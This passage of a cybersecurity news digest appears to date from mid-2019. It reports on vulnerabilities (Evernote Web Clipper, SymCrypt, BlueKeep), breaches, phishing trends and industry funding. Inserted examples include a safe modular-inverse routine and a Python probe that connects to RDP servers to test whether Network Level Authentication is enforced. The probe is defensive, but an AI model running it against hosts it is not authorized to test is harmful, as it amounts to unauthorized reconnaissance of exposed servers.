According to Guardio: The logical coding error in the Web Clipper extension could have allowed an attacker to bypass the browser’s same origin policy, granting the attacker code execution privileges in Iframes beyond Evernote’s domain. As the browser’s domain-isolation mechanisms were broken, code could be executed that could allow an attacker to perform actions on behalf of the user as well as grant access to sensitive user information on affected third-party web pages and services, including authentication, financials, private conversations in social media, personal emails, and more.

Michael Vainshtein, CTO at Guardio, said: “The vulnerability we discovered is a testament to the importance of scrutinizing browser extensions with extra care. People need to be aware that even the most trusted extensions can contain a pathway for attackers. All it takes is a single unsafe extension to compromise anything you do or store online. The ripple effect is immediate and intense.”

The story highlights the importance of swift vulnerability disclosure, response and remediation, particularly given the fact that the flaw had the potential to affect any number of Evernote’s users (around 4,600,000 at the time of discovery).

KnowBe4 Gets Whopping $300m in Funding

A private equity giant has invested an additional $300 million in cybersecurity awareness firm KnowBe4 only three months after announcing its initial investment of $50 million, according to Fortune.

At the helm of the company, which provides integrated security awareness training and a simulated phishing platform, are Stu Sjouwerman, CEO, and Kevin Mitnick, chief hacking officer. Founded in 2010, the company now boasts more than 25,000 users across the globe from highly regulated industries to global organizations.

“The company helps organizations address the human element of security by raising awareness of ransomware, CEO fraud and other social engineering tactics through a new-school approach to security awareness training,” the June 12 press release said.

“Having secured additional funding, as well as 'unicorn' status as a private company valued at $1 billion, KnowBe4 now plans to continue an ambitious international expansion that, in 2019 alone, has seen it acquire two cybersecurity companies located in different parts of the globe: Brazil-based El Pescador and Norway-based CLTRe,” Fortune reported.

In response to the company earning unicorn status, KnowBe4 CEO Stu Sjouwerman lauded the relationship the company has built with its investment firm, KKR. Sjouwerman’s blog post emphasized his plentiful gratitude:

I'd like to thank you for your trust in us, and for telling your friends about our platform. This is only the beginning of building a strong human firewall and we still need all the help we can get.

So from the bottom of our hearts, thank you so much. We will continue doing our level best to help you keep your organization safe, and please keep spreading the word.

“Organizations are beginning to understand that when it comes to security, building a human firewall takes precedence over merely deploying technology,” Sjouwerman told Infosecurity. “This investment is a representation of what we're seeing in the market, which is more emphasis placed on the area of security awareness training and education as a key way to manage the ongoing problem of social engineering.”

Philly Courts Still Down after Cyber-Attack

After a May 21, 2019, cyber-attack downed Philadelphia’s online court system for e-filing and docketing services, issues remain throughout the county, according to Government Technology.

On June 11, Government Technology reported that the computer networks of the Luzerne County Correctional Facility in Pennsylvania continue to be impacted, leaving inmates unable to order items from the jail commissary.

“The First Judicial District and City OIT are working in concert to ensure the safety of the First Judicial District’s electronic web system following the discovery of malware on a limited number of FJD workstations. As a precautionary measure the FJD’s website, employee email accounts, and electronic filing (e-file) have been temporarily suspended,” a May 31 notice from the Philadelphia Courts First Judicial District of Pennsylvania stated.

“We are currently unable to provide more information concerning this virus so as not to provide any detail-specific information that could jeopardize the remediation process we are engaged in. In addition to City OIT, the FJD is contracting the services of a firm specializing in cybersecurity to assist in getting impacted operations restored safely.”

Since then, the courts have been using social media to engage with members of the community. On June 10, the Philadelphia courts expressed appreciation for the community’s patience as employees work to meet filing needs.

The city has reportedly hired a cybersecurity firm to investigate the attack, though said firm has not been named.

“Declining to name a publicly funded contractor has raised eyebrows. So far, the court has described the unnamed vendor as a firm 'specializing in cyber security to assist in getting impacted operations restored safely.' Courts spokesperson Marty O’Rourke has declined repeated requests for the name of the vendor – as well as the amount the city is paying for these services,” Billy Penn’s Max Marin reported.

Flaw in SymCrypt Can Trigger DDoS

A vulnerability in the SymCrypt cryptographic library of Microsoft's OS can trigger a distributed denial-of-service (DDoS) disruption in Windows 8 servers and above, causing a perpetual operation "when calculating the modular inverse on specific bit patterns with bcryptprimitives!SymCryptFdefModInvGeneric," according to Tavis Ormandy, a Google researcher.

“I noticed a bug in SymCrypt, the core library that handles all crypto on Windows. It's a DoS, but this means basically anything that does crypto in Windows can be deadlocked (s/mime, authenticode, ipsec, iis, everything). Microsoft committed to fixing it in 90 days, then didn't,” Ormandy tweeted.

Now that we’ve entered into the 91st day, Ormandy has gone public with what he said is a relatively low severity bug. “I've been able to construct an X.509 certificate that triggers the bug. I've found that embedding the certificate in an S/MIME message, authenticode signature, schannel connection, and so on will effectively DoS any windows server (e.g., ipsec, iis, exchange, etc.) and (depending on the context) may require the machine to be rebooted. Obviously, lots of software that processes untrusted content (like antivirus) call these routines on untrusted data, and this will cause them to deadlock,” Ormandy wrote in the Project Zero vulnerability report.

Ormandy noted that while it is a low-severity bug, it would be possible to take down an entire Windows fleet relatively quickly if exploited. Infosecurity reached out to Microsoft for comment, but the company has not responded.
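As an added example, not SymCrypt's code and not a reproduction of the bug: a modular inverse written so that no input can make it loop forever, which is the property the report above says was violated. The step cap is this example's own safeguard, not a description of Microsoft's fix.

```python
"""A modular inverse that terminates on every input.

Added example, not SymCrypt's code. It rejects a degenerate modulus, reports
non-invertible inputs (gcd != 1) instead of looping, and caps the number of
Euclidean steps at a bound derived from the modulus size, so a logic error
surfaces as an exception rather than as a stuck thread.
"""
from typing import Optional


def modinv(a: int, m: int) -> Optional[int]:
    """Return a^-1 mod m, or None if a is not invertible modulo m."""
    if m < 2:
        raise ValueError("modulus must be at least 2")
    a %= m
    if a == 0:
        return None
    # Extended Euclid. Invariant: old_r == old_s*a (mod m) and r == s*a (mod m).
    old_r, r = a, m
    old_s, s = 1, 0
    # Lamé's theorem bounds the number of division steps by roughly
    # 1.44 * log2(m) + 1; 2 * bit_length + 2 leaves a comfortable margin.
    max_steps = 2 * m.bit_length() + 2
    steps = 0
    while r != 0:
        steps += 1
        if steps > max_steps:
            raise RuntimeError("Euclidean loop exceeded its step bound")
        q = old_r // r
        old_r, r = r, old_r - q * r
        old_s, s = s, old_s - q * s
    if old_r != 1:
        return None  # gcd(a, m) != 1: no inverse exists
    return old_s % m


def modinv_checked(a: int, m: int) -> Optional[int]:
    """Same as modinv, but verifies a * inv == 1 (mod m) before returning."""
    inv = modinv(a, m)
    if inv is not None and (a * inv) % m != 1:
        raise RuntimeError("inverse verification failed")
    return inv


def exhaustive_check(m: int) -> bool:
    """Compare modinv_checked against Python's pow(a, -1, m) for every residue,
    treating 'not invertible' (ValueError from pow) as None."""
    for a in range(m):
        try:
            expected = pow(a, -1, m)
        except ValueError:
            expected = None
        if modinv_checked(a, m) != expected:
            return False
    return True


if __name__ == "__main__":
    print(modinv(3, 11), modinv(4, 8), exhaustive_check(360))
```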

"This finding demonstrates just how important this type of research is in helping organizations mitigate risks no one ever knew existed. The frightening part about this vulnerability and others that can be remedied with a simple patch, however, is that many organizations will have a very difficult time actually implementing the fix,” said Adam Laub, SVP product management, STEALTHbits Technologies.

“When I first started in the industry nearly 15 years ago, patch management was very much the flavor of the day – much like privileged access management (PAM) and artificial intelligence (AI) technologies command significant mind share among security practitioners now. Sadly, the patch management problem persists despite advances in so many other areas of IT management, which could make this 'low severity' vulnerability a lot more pungent than it ought to be."

XSS is Most Rewarding Bug Bounty as CSRF is Revived

Cross-site scripting (XSS) is the most rewarding security vulnerability, according to data on the number of bug bounties paid.

According to HackerOne’s list of the top 10 most impactful security vulnerabilities, which have earned hackers over $54m in bounties and which is based on over 1,400 HackerOne customer programs and 120,000 reported vulnerabilities, XSS is the most paid-out vulnerability, followed by “improper authentication – generic” and “information disclosure.”

HackerOne’s Top 10 security vulnerabilities are:

  1. Cross-site Scripting - All Types (dom, reflected, stored, generic)
  2. Improper Authentication - Generic
  3. Information Disclosure
  4. Privilege Escalation
  5. SQL Injection
  6. Code Injection
  7. Server-Side Request Forgery (SSRF)
  8. Insecure Direct Object Reference (IDOR)
  9. Improper Access Control - Generic
  10. Cross-Site Request Forgery (CSRF)

By comparison, in the current OWASP Top Ten, last refreshed in 2017, XSS featured only in seventh place, while SQL Injection, which held the top position in the OWASP list, appeared in fifth place in HackerOne’s.

Speaking to Infosecurity, Rahim Jina, COO of edgescan, said that from their stats XSS accounts for nearly 15% of application layer vulnerabilities found, showing a slight increase year on year.

“This is a vulnerability we nearly expect to find when we are assessing a web application (you tend to find multiple instances in an application, if you find them),” he said. “XSS has been around a long time and when highlighted, developers typically can resolve these, however we frequently see the same issues being introduced by these developers subsequently. I believe there is an educational problem here which needs to be addressed (people do get training, however they often seem to re-introduce XSS issues subsequently for whatever reason).”

Miju Han, director of product management at HackerOne, said: “We see a 40% crossover of the HackerOne Top 10 to the latest version of the OWASP Top 10. Both assets will be able to help security teams identify the top risks; ours also takes into account volume and bounty values, which we think will be of particular interest to security teams looking to protect against criminal hackers.”

Cross-Site Request Forgery, which was removed from the last OWASP Top 10, having appeared in seventh place in the 2013 OWASP Top 10, was the tenth most paid bug for HackerOne.

Jina said that CSRF “is an interesting one”: last year it accounted for 1.75% of the total app-layer vulnerabilities found by edgescan, and the reason many cite is that most modern web app frameworks include built-in CSRF defenses which can be enabled easily.

“Scanners tend to report this issue with high frequency, however when you actually look at the issue, the transaction may not be relevant – CSRF is about abusing a transaction in some meaningful way,” he said.

“Finding it may be relatively easy, however validating the real issue takes some effort. Additionally, due to the often complex nature of actually abusing such an issue successfully, these are often presented as lower risk items.”

Jina said that there is a slight increase in CSRF issues in general, as fixing them appears to be much easier: often simply turning on such a defense (where the framework provides one, usually a configuration change) will protect the entire application in one go, as opposed to having to go into the code and fix each instance.

“We find that explaining the underlying risk and cause of CSRF issues can be confusing to developers and is often misunderstood.”

Microsoft Fixes Four SandboxEscaper Zero-Days

Microsoft has released its latest monthly security updates and there are four fixes for zero-day threats published recently by SandboxEscaper.

In total Redmond fixed 88 vulnerabilities in this update round with 21 labelled critical.

The four zero-days are all elevation of privilege flaws which affected Windows: CVE-2019-1069 is a bug in the Windows Task Scheduler, CVE-2019-1064 is an elevation of privilege bug in Windows, CVE-2019-1053 is a vulnerability in Windows Shell which could allow elevation of privilege on the affected system by escaping a sandbox and CVE-2019-0973 is a flaw in Windows Installer.

The recently disclosed BlueKeep vulnerability (CVE-2019-0708) in RDP should also be a priority for system admins, after Microsoft warned that it could be “wormable” — that is, exploitable without the need for user interaction.

However, patching is just one part of the defense-in-depth approach IT security teams need to take, according to Ivanti director of security solutions, Chris Goettl.

“Currently around 1.6 million public facing RDP servers are under the attack of a botnet called GoldBrute. Instead of exploiting a vulnerability, GoldBrute is attacking weak passwords. A couple of things to assess in your environment: do you have public facing RDP services exposed? Have you assessed its configuration?” he explained.

“Ideally, blocking RDP at the perimeter is best. Restricting access to a VPN controls the exposure of RDP more. Enabling network-level authentication can help mitigate BlueKeep. Ensure any credentials available over RDP have strong passwords that are changed regularly.”
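Goettl's "have you assessed its configuration?" can be answered from outside, without credentials. The following added example (not Ivanti's or Microsoft's code) implements the check that RDP scanners use: it opens a connection offering only legacy "standard RDP security" and reads the server's negotiation answer, which per MS-RDPBCGR is an RDP_NEG_FAILURE with HYBRID_REQUIRED_BY_SERVER when Network Level Authentication is enforced. The sample replies are constructed for offline use; check_nla() is the live probe, to be run only against hosts you are authorized to test. NLA narrows BlueKeep exposure to attackers who already hold valid credentials; it is a mitigation, not a substitute for the patch.

```python
import socket
import struct

# Security protocol values and negotiation structures from MS-RDPBCGR. The client
# lists the protocols it supports in an RDP_NEG_REQ inside the X.224 Connection
# Request; the server answers with RDP_NEG_RSP (a protocol it accepts) or
# RDP_NEG_FAILURE (why it refuses).
PROTOCOL_RDP = 0x00000000      # legacy "standard RDP security": no TLS, no NLA
PROTOCOL_SSL = 0x00000001      # TLS; credentials are sent once the session exists
PROTOCOL_HYBRID = 0x00000002   # CredSSP, i.e. Network Level Authentication

TYPE_RDP_NEG_REQ = 0x01
TYPE_RDP_NEG_RSP = 0x02
TYPE_RDP_NEG_FAILURE = 0x03
HYBRID_REQUIRED_BY_SERVER = 0x00000005

FAILURE_CODES = {
    0x01: "SSL_REQUIRED_BY_SERVER",
    0x02: "SSL_NOT_ALLOWED_BY_SERVER",
    0x03: "SSL_CERT_NOT_ON_SERVER",
    0x04: "INCONSISTENT_FLAGS",
    0x05: "HYBRID_REQUIRED_BY_SERVER",
    0x06: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER",
}


def build_connection_request(requested_protocols):
    """TPKT header + X.224 Connection Request TPDU + RDP_NEG_REQ: 19 bytes on the wire."""
    neg_req = struct.pack("<BBHI", TYPE_RDP_NEG_REQ, 0, 8, requested_protocols)
    # X.224 CR: length indicator, TPDU code 0xE0, dst-ref, src-ref, class 0
    x224 = struct.pack(">BBHHB", 6 + len(neg_req), 0xE0, 0, 0, 0) + neg_req
    return struct.pack(">BBH", 3, 0, 4 + len(x224)) + x224


def interpret_connection_confirm(data):
    """Decode the server's X.224 Connection Confirm for a probe that offered only
    PROTOCOL_RDP. NLA is enforced exactly when the server refuses with
    HYBRID_REQUIRED_BY_SERVER; acceptance, or refusal for any other reason,
    means a client gets past protocol negotiation without credentials."""
    if len(data) < 11 or data[0] != 3:
        raise ValueError("not a TPKT packet")
    if struct.unpack(">H", data[2:4])[0] != len(data):
        raise ValueError("TPKT length does not match payload")
    if (data[5] & 0xF0) != 0xD0:
        raise ValueError("not an X.224 Connection Confirm")
    result = {"nla_enforced": False, "selected_protocol": None, "failure": None}
    if len(data) == 11:
        # No negotiation structure at all: a pre-negotiation server that only
        # speaks standard RDP security.
        result["selected_protocol"] = PROTOCOL_RDP
        return result
    neg_type, _flags, length, value = struct.unpack("<BBHI", data[11:19])
    if length != 8:
        raise ValueError("malformed RDP negotiation structure")
    if neg_type == TYPE_RDP_NEG_FAILURE:
        result["failure"] = FAILURE_CODES.get(value, "UNKNOWN_%#x" % value)
        result["nla_enforced"] = value == HYBRID_REQUIRED_BY_SERVER
    elif neg_type == TYPE_RDP_NEG_RSP:
        result["selected_protocol"] = value
    else:
        raise ValueError("unexpected negotiation type %#x" % neg_type)
    return result


def check_nla(host, port=3389, timeout=5.0):
    """Live probe against a host you are authorized to test: offer only legacy
    RDP security and see whether the server refuses."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_connection_request(PROTOCOL_RDP))
        data = sock.recv(64)
    return interpret_connection_confirm(data)


# Constructed server replies for offline use; not captured from a real host.
CC_HEADER = b"\x03\x00\x00\x13\x0e\xd0\x00\x00\x12\x34\x00"
SAMPLE_NLA_REQUIRED = CC_HEADER + struct.pack("<BBHI", TYPE_RDP_NEG_FAILURE, 0, 8, HYBRID_REQUIRED_BY_SERVER)
SAMPLE_TLS_ONLY = CC_HEADER + struct.pack("<BBHI", TYPE_RDP_NEG_FAILURE, 0, 8, 0x01)
SAMPLE_LEGACY_ACCEPTED = CC_HEADER + struct.pack("<BBHI", TYPE_RDP_NEG_RSP, 0, 8, PROTOCOL_RDP)
SAMPLE_NO_NEGOTIATION = b"\x03\x00\x00\x0b\x06\xd0\x00\x00\x12\x34\x00"

if __name__ == "__main__":
    for name, reply in [("NLA required", SAMPLE_NLA_REQUIRED), ("TLS only", SAMPLE_TLS_ONLY),
                        ("legacy accepted", SAMPLE_LEGACY_ACCEPTED), ("no negotiation", SAMPLE_NO_NEGOTIATION)]:
        print(f"{name:16} -> {interpret_connection_confirm(reply)}")
```

A server answering SSL_REQUIRED_BY_SERVER has TLS but not NLA: the transport is encrypted, yet the pre-authentication RDP code that BlueKeep and password guessing both reach is still exposed, so that result should be treated as a finding, not a pass.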

Elsewhere, there’s one critical update for Flash Player this month, fixing a bug (CVE-2019-7845) which could allow arbitrary code execution on a victim’s machine. Adobe also announced patches for three critical ColdFusion vulnerabilities and seven Adobe Campaign bugs, one of which is critical.

FBI: Don’t Trust HTTPS or Padlock on Websites


The FBI has been forced to issue an alert warning users that the sight of "HTTPS" and a padlock icon in the address bar may not be enough to prove the authenticity of a website.

The latest Public Service Announcement from the bureau’s public-facing Internet Crime Complaint Center (IC3) revealed that cyber-criminals are increasingly abusing trust in TLS-secured websites to improve the success rate of phishing attacks.

“They are more frequently incorporating website certificates — third-party verification that a site is secure — when they send potential victims emails that imitate trustworthy companies or email contacts,” it warned.

“These phishing schemes are used to acquire sensitive logins or other information by luring them to a malicious website that looks secure.”

Corin Imai, senior security adviser at DomainTools, argued that the falling price of SSL/TLS certificates makes them a no-brainer for malicious webmasters. A domain-validated certificate attests only that whoever obtained it controlled the domain name at the time of issuance; it says nothing about who they are or whether the site is legitimate.

“Thankfully, education is the single security measure that criminals can’t work around: an aware user, who has been trained to look for misspellings in the URL of a web page and knows not to trust a padlock icon, is much harder to lure into giving away personal information or clicking on malware-spreading links,” she added.

“Organizations should therefore invest in solid training programs, which cannot be limited to a one-day workshop on what a phishing scam looks like, but need to be continuous, thorough and impactful.”

To that end, the FBI urged users to go back to basics: do not click on links in suspicious-looking emails, and follow up with the sender directly, even when the contact is known.

Hackers are also hosting malware on cloud services such as Azure and benefiting from their HTTPS certificates indirectly this way, experts have revealed.

Code Signing Shortcomings Leave Gaps for Hackers


Only a little over a quarter (28%) of global organizations have a clearly defined security process in place for code signing, potentially opening the door for hackers to steal and use these certificates in attacks, according to new Venafi research.

The security vendor polled 320 security professionals in the US, Canada and Europe to better understand the risks around code signing, the process that lets software and updates be verified as coming from their publisher and as unaltered since they were signed.

Although half said they were concerned that cyber-criminals are using forged or stolen code signing certificates to breach organizations, few enforce security policies at this layer. The figure for European respondents was even lower than the overall average, at just 14%.

What’s more, over a third (35%) admitted that they don’t have a clear owner for the private keys used in code signing.

The challenge is likely to become even more acute going forward, with 69% of firms saying they plan to increase usage of code signing in the coming year, according to Venafi.

The vendor’s vice-president of security strategy and threat intelligence, Kevin Bocek, argued that code signing certificates enabled both the notorious Stuxnet and ShadowHammer attacks to succeed.

“Security teams and developers look at code signing security in radically different ways. Developers are primarily concerned about being slowed down because of their security teams’ methods and requirements. This disconnect often creates a chaotic situation that allows attackers to steal keys and certificates,” he added.

“In order to protect themselves and their customers, organizations need a clear understanding of where code signing is being used, control over how and when code signing is allowed, and integrations between code signing and development build systems. This comprehensive approach is the only way to substantially reduce risk while delivering the speed and innovation that developers and businesses need today.”

Radiohead Officially Releases Music Stolen in Hack


A week after receiving a ransom request for $150,000, alternative-rock band Radiohead decided to go live with the 18 hours of stolen music that was never intended for public consumption.

On June 5, Consequence of Sound reported that 18 hours of Radiohead’s music was leaked online. The band announced on June 11 that it has officially released the leaked material through Bandcamp and is donating the proceeds to the climate activist group Extinction Rebellion.

Band member Jonny Greenwood tweeted that a hacker stole MiniDisc archives of the band’s OK Computer sessions.

We got hacked last week - someone stole Thom’s minidisk archive from around the time of OK Computer, and reportedly demanded $150,000 on threat of releasing it.

So instead of complaining – much – or ignoring it, we’re releasing all 18 hours on Bandcamp in aid of Extinction Rebellion. Just for the next 18 days. So for £18 you can find out if we should have paid that ransom.

Never intended for public consumption (though some clips did reach the cassette in the OK Computer reissue) it’s only tangentially interesting. And very, very long. Not a phone download. Rainy out, isn’t it though?


“Hackers holding data hostage is a growing concern for businesses, as hackers have found out that crime does pay and people are willing to pay to regain control of their own data," said Matan Or-El, CEO of Panorays. "In their efforts to stop the hackers’ booming business, the FBI and industry experts strongly recommend never paying the ransom.

"Radiohead has taken an additional route – a creative one – to defeat hackers. Their method levels the playing field by beating hackers in their own game and simply releasing their album to the public.”

SOCs Struggle with Staffing, Reporting and Visibility


Staffing remains an issue for security operations centers (SOCs), which continue to struggle with reporting and documentation while barely being able to stay afloat in a sea of alerts and false positives, according to the annual State of the SOC report from Exabeam.

The report found approximately one-third of respondents said that their SOC was understaffed by 6–10 people. “Nearly 50% of understaffed SOCs indicated they don’t have sufficient funding for technology, while respondents of larger SOCs said that despite recent or increased funding for technology, they recommend continued investment in newer, more modern technologies (39%),” the press release said.

In addition, shifting roles and responsibilities is a top challenge for SOC managers, with C-suite executives taking on the tasks of incident response and threat hunting, while frontline employees are completing fewer operational tasks.

Only 5% of respondents said they see all of the events in their security information and event management (SIEM) system. Not having full visibility into events is a handicap for SOC managers, who reported that a lack of visibility makes them more likely to miss security alerts. With legacy applications unable to log events, 39% of SOC personnel named this gap in security alerting as the largest pain point leaving their organization more vulnerable to cyber-attacks.

“There’s an idiom, ‘what you don’t know can’t hurt you.’ But in the information security business, that couldn’t be further from the truth. In fact, it’s what you don’t know – or worse, can’t see – that will significantly harm your business,” said Steve Moore, chief security strategist at Exabeam. “From our survey, an example of how this can manifest is general lack of environmental visibility in the form of too few logs – you can’t protect what you can’t see. Visibility, event context and automation play a key role in building relevant defense, so you can have a fighting chance against even the most sophisticated adversaries.”

Increasingly, SOC managers are placing greater value on soft skills, such as communication, with 65% of respondents saying personal and social skills play a critical role in the success of a SOC. The report also found that hard skills, such as threat hunting and data loss prevention, have increased in importance.

Have I Been Pwned Open to Acquisition

Since its inception in 2013, the Have I Been Pwned (HIBP) website has grown exponentially, to the point where it is no longer feasible for one person to maintain, which is why Troy Hunt, the site’s creator, today announced that he is open to the possibility of an acquisition.

The prevalence of breaches, combined with the analysis he was doing and the scale of the Adobe breach, is what sparked the idea for HIBP, Hunt said. “I wonder how many people know? Do they realize they were breached? Do they realize how many times they were breached? And perhaps most importantly, have they changed their password (yes, almost always singular) across the other services they use? And so Have I Been Pwned was born.”

In an exclusive interview with Infosecurity, Hunt joked that he has often been asked what would happen to the site if he were hit by a bus. “Microsoft has my credit card, so the site would continue, but who would manage it?” Hunt said.

Fans of the site have applauded Hunt for “doing God’s work,” but the man is indeed a mere mortal. “It’s gotten to the point where the service has become enormously popular and the effort required to maintain it is exceeding my time availability,” Hunt said. “It’s also making it clear that there is a lot more to be done than I’m able to do on my own. There needs to be a better continuity plan than just one person doing this in their spare time.”

With 8 billion breached records included in its database, the site has nearly 3 million subscribers. “I’ve emailed those folks about a breach 7 million times, there are 120,000 people monitoring domains they’ve done 230,000 searches for and I’ve emailed them another 1.1 million times. There are 150,000 unique visitors to the site on a normal day, 10 million on an abnormal day, another couple of million API hits to the breach API and then 10 million a day to Pwned Passwords.”

Though there is no one organization Hunt is eyeing for acquisition, he did say that he will continue to be involved in the future of HIBP. “There's a heap of things I want to do with HIBP which I simply couldn't do on my own. This is a project with enormous potential beyond what it's already achieved and I want to be the guy driving that forward,” Hunt wrote.

FTSE 250+ Demonstrate Weak Security, but Low SMB Exposure


FTSE 250+ organizations leave an average of 35 servers and devices exposed to the open internet, while 231 have “weak or non-existent” phishing defenses.

According to research by Rapid7, many companies in the FTSE 250+ indicate how many and which cloud service providers they use in their DNS metadata. The research found that 114 organizations use between two and seven cloud service providers. 

Tod Beardsley, director of research at Rapid7, told Infosecurity that this is the “best of the best of IT in Britain,” and that what stood out to him was the number of services exposed, which averaged in the thirties, although some companies expose thousands and others only a few.

He said: “We look at each company and ask how many versions of IIS or nginx are they running, or how many versions of Apache? Do they standardize on one version, which every company wants to do because it makes things a lot easier with a lot less overhead, or are they running 20 different versions of Apache, which tells me they have really fragmented asset management processes and are not doing patches, and doing black box stuff.”

One “bright side” that Beardsley pointed out for the UK was fewer SMB servers, with only seven found in total.

Of the average 35 exposed services, Beardsley admitted that if he were managing a company’s IT and only found 35, he would be delighted as “it sounds really good” as when you get to 300-400 it becomes a full time job.

Elsewhere, 19% of the FTSE 250+ organizations are not enforcing SSL/TLS security. Beardsley said that there is a lack of 302 redirects from HTTP to HTTPS, and “a lot of clear text HTTP as the front page” for household brands. He admitted that for a country so determined to get him to accept cookies, this was surprising as it permitted injection attacks as well as Man-in-the-Middle attacks.

Asked if he felt whether this puts the FTSE 250+ in a positive light, Beardsley said that there is work to be done, and while the SMB and Telnet stats are a good thing, Rapid7 is seeing connections from FTSE 250+ companies to its honeypot “as if we are part of the same network so it is accidental self-compromise.”

Welsh Man Gets Four Years for TalkTalk Attack


A Welsh man diagnosed with Asperger’s syndrome has been sentenced to four years behind bars for his role in a cyber-attack on TalkTalk which cost the company £77m.

Daniel Kelley, 22, from Llanelli, Carmarthenshire, will serve his sentence in a young offenders’ institution, having pleaded guilty to 11 offenses back in 2016.

These included: hacking the ISP and attempting to blackmail CEO Dido Harding and other executives, as well as “hacking his local college, encouraging and assisting hacking, possessing and offering to supply TalkTalk customer and other data and converting proceeds of blackmail from an Australian victim,” according to the Met Police.

“Kelley’s computers revealed that from 2013 to 2015 he had embarked on a cybercrime campaign, hacking and blackmailing individuals and companies, attempting to sell compromised personal data online and committing cyber-attacks on infrastructure,” the London police force said.

“Over the three-year period, Kelley demanded over 753 Bitcoins valued at more than £123,700 successfully extorting £4400 in Bitcoins and attempted to conceal, convert and launder Bitcoins into cash. He had attempted to anonymize and conceal his identity and activities online using technology. As a result a significant amount of additional cybercrime offenses were identified and investigated by the Met.”

According to reports, Kelley turned to cybercrime after failing to get the grades he needed to get onto a computer course.

Kelley is just one of several people arrested following the 2015 attack on TalkTalk which led to the compromise of data on over 100,000 customers.

Another was a 17-year-old at the time, who admitted he hacked the firm to show off to friends.

The young age of the offenders is another indication that efforts are failing to get talented children to use their computing skills for positive ends.

At Infosecurity Europe last week, HaveIBeenPwned founder Troy Hunt urged: “We’ve got to do more to set kids back on the right path.”

US Customs Contractor Hack Breaches Traveller Images


US Customs and Border Protection (CBP) has admitted a data breach at a sub-contractor has compromised images of individuals and vehicles entering and leaving the country.

The controversial agency first learned of the “malicious cyber-attack” on May 31.

“CBP learned that a subcontractor, in violation of CBP policies and without CBP’s authorization or knowledge, had transferred copies of license plate images and traveler images collected by CBP to the subcontractor’s company network,” it said in a statement.

“Initial information indicates that the subcontractor violated mandatory security and privacy protocols outlined in their contract.”

According to the agency, none of the stolen data has yet been spotted on the dark web, although it may be being traded on closed forums.

It’s believed that it covers tens of thousands of travellers for a period of over a month.

The contractor has not been officially named, although there are suggestions that it could be Perceptics, a firm that supplies license plate reader technology to the government.

Robert Cattanach, a partner at the international law firm Dorsey & Whitney, argued that consumer rights in this area are limited, despite the California Consumer Privacy Act (CCPA), a new state law designed to strengthen them.

“Unless a traveler can prove that they have been harmed somehow by the disclosure of their information and location at a border or airport there is very little anyone can do once their information has been stolen, and then often made available on the dark web. US Courts have been reluctant to award damages absent a showing of specific and concrete harm,” he argued.

“The CCPA does not apply to the US government, and more robust federal privacy protections have been repeatedly stalled in Congress. Rapidly evolving technology that collects vast amounts of individual data, coupled with the dramatic cultural differences between various countries that collect it, make this an even more challenging problem for individuals and their political systems to reconcile.”

Chinese Uni Exposes 8TB+ of Email Metadata


A prestigious Chinese university leaked over 8TB of email metadata via an unsecured Elasticsearch database, a researcher has revealed.

Cloudflare director, Justin Paine, discovered the database, which had no authentication, on May 22 after a simple Shodan search.

In total, there were 9.5 billion rows, which equated to 8.4TB of metadata from the popular open source Zimbra email platform. Although the database didn’t contain the subject line or body text of emails, it revealed a significant amount of detail, according to Paine.

“Based on the metadata I was able to locate all email being sent or received by a specific person. This data also included the IP address and user agent of the person checking their email. As such, I could locate all the IPs used and device type of a specific person,” he explained.

“Using this metadata I could see the high level details of a specific email exchange such as which email address was sending or receiving an email from a different email address.”

The data in question came from Shanghai Jiao Tong University, described online as the “MIT of the East,” with over 41,000 students. However, it acted promptly to secure the data once notified, Paine said.

He added that no students appeared to have had their data exposed in the leak.

The discovery is just the latest instance of a major privacy leak via an unprotected Elasticsearch database.

Back in November 2018, the personal information of nearly 82 million Americans was exposed online for at least two weeks after a similar find.

There was another spate of incidents in January this year, exposing millions more records belonging to banks, casinos and non-profits.

According to Elastic, the company behind Elasticsearch, these reports usually indicate that an individual or organization has “actively configured their installations to allow unauthorized and unauthenticated users to access their data over the internet.” Out of the box, Elasticsearch listens only on localhost; binding it to a public address is a deliberate configuration change, and doing so with no authentication in front of it is what these leaks have in common.

Criminals Try to Schedule Spam in Google Calendar


A sophisticated scam is targeting Gmail users through fraudulent, unsolicited Google Calendar notifications as well as through other Google services, including Photos and Forms, according to Kaspersky.

In these scams, criminals exploit a default Google Calendar setting that automatically adds invitations to the user’s calendar and shows a notification for each one.

Cyber-criminals reportedly send targets an unsolicited calendar invitation with a malicious link to a phishing URL. A pop-up notification of the invitation appears on the smartphone’s screen, where the recipient is tempted to click on the link. However, the website to which they are delivered asks victims to enter their credit card details and add some personal information – which is sent straight to the scammers.

“The ‘calendar scam’ is a very effective scheme, as most people have become used to receiving spam messages from emails or messenger apps,” said Maria Vergelis, security researcher at Kaspersky, in a press release.

“But this may not be the case when it comes to the Calendar app, which has a main purpose to organize information rather than transfer it. So far, the sample we’ve seen contains text displaying an obviously weird offer, but as it happens, every simple scheme becomes more elaborate and trickier with time. The good news is that it’s fairly easy to avoid such a scam – the feature that enables it can be easily turned off in the calendar settings.”

Kaspersky advised that turning off the auto-add feature will help to prevent falling victim to the scam. “To do so, open Google Calendar, click the settings Gear Icon, then on Event Settings. For the ‘automatically add invitations’ option, click on the drop-down menu and select ‘No, only show invitations to which I've responded’. Below this, in the View Options section, make sure ‘Show declined events’ is NOT checked, unless you specifically wish to view these,” today’s press release said.

In addition to the Calendar service, scammers are also leveraging Google Photos, sending pictures that detail a large remittance that the recipient can receive if they reply to the email address supplied in the message.

“A photo of a nonexistent check should immediately betray the scammers’ intentions. The check states that some commission fee will unlock a much larger amount. After the victim pays up, the scammers simply vanish into the ether,” researchers wrote.

Data of 1m Users Lost in EmuParadise Breach


Community members have taken to social media to share the news that the accounts of more than 1 million gamers were reportedly leaked after EmuParadise suffered a data breach, according to multiple reports. 

Some of those impacted by the data breach of the retro gaming site, which used to host ROMs, said that over the weekend they started receiving notices that their accounts had been compromised.

“The retro gaming website EmuParadise was breached in April 2018. The vBulletin forum exposed 1.1m email addresses, IP addresses, usernames and passwords stored as salted MD5 hashes. 71% of addresses were already in @haveibeenpwned,” the Have I Been Pwned account tweeted.

The site boasts “a huge community, a vast collection of gaming music, game related videos (movies, fmvs, etc.), game guides, magazines, comics, video game translations and much much more!” Infosecurity has contacted EmuParadise and will update if the company responds.

